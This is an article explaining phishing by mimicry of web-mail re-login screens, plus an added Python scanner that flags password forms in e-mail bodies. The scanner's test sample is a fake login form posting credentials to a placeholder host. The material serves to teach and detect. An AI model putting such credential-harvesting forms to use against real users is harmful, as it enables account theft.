What to get from where
If we want to obtain something we need at least a vague idea of what that is and where we can get it.
Let's assume that we want to gain access to a system protected with a password. One way, an elegant way, to get into the system is to obtain the password. So the password is what we want.
Now we need to find out where to get the password from. Let's also assume that the person who issued the password (the password holder) is able to reproduce it whenever necessary.
How to get it
Under which circumstances will she be willing, eager even to give away that precious phrase?
Right. Whenever the password is needed to access the protected system she will issue it without suspicion and actually believing she is doing something right. Of course she will have a more or less precise idea of the environment where it is not only required but also "safe" to enter the password.
Our goal thus is to emulate this environment as exactly as possible.
How it Works
When a Hotmail session has been idle for some time, for example, the user is automatically logged out and upon a request to access her account has to re-login.
If this re-login screen is emulated in an email, what is intended to be a security feature turns into a security risk: you type in the password to log into Hotmail again, but the password is silently sent to the password phisher instead.
Of course, a web-based email's log-in screen could also be replaced with an exact copy that sends the user name and password to the password thief instead of (or in addition to) logging you in.
How to Stop it
Unfortunately, no fool-proof way to prevent a mimicry attack seems to exist and no "fix" is actually possible (there is nothing "broken"). All we can do is be alert and make imitating the login-process more difficult.
You can increase your email's security by
- being generally suspicious and
- thinking two times before you type any password anywhere.
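One mechanical form of the alertness asked for above, as an added example that is not part of the original text: the emulated re-login screen from "How it Works" is, technically, an HTML form with a password field whose action points at the phisher's host. The scanner below parses an e-mail body and flags every password-bearing form whose target host is not on an allow-list; the sample e-mail, the host name login-example.invalid and the allow-list mail.example.com are all constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: an HTML e-mail body that mimics a web-mail re-login
# screen but posts the credentials to a third-party host. The host name is
# a placeholder for this example, not a real indicator.
SAMPLE_EMAIL_HTML = """
<html><body>
<p>Your session has expired. Please sign in again.</p>
<form action="http://login-example.invalid/collect" method="post">
  <input type="text" name="user">
  <input type="password" name="pass">
  <input type="submit" value="Sign in">
</form>
</body></html>
"""

class _FormScanner(HTMLParser):
    """Collects the action URL of every <form> that contains a password input."""
    def __init__(self):
        super().__init__()
        self._current = None      # action URL of the form currently open, if any
        self.password_forms = []  # action URLs of forms holding a password field

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = a.get("action") or ""
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password" \
                    and self._current not in self.password_forms:
                self.password_forms.append(self._current)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def find_credential_forms(body_html, trusted_hosts=frozenset()):
    """Return the action URLs of password forms whose target host is not in
    trusted_hosts. A missing or relative action counts as untrusted, and with
    an empty allow-list (the sensible policy for e-mail bodies, which should
    never carry a login form) every password form is flagged."""
    scanner = _FormScanner()
    scanner.feed(body_html)
    flagged = []
    for action in scanner.password_forms:
        host = (urlparse(action).hostname or "").lower()
        if host not in trusted_hosts:
            flagged.append(action)
    return flagged
```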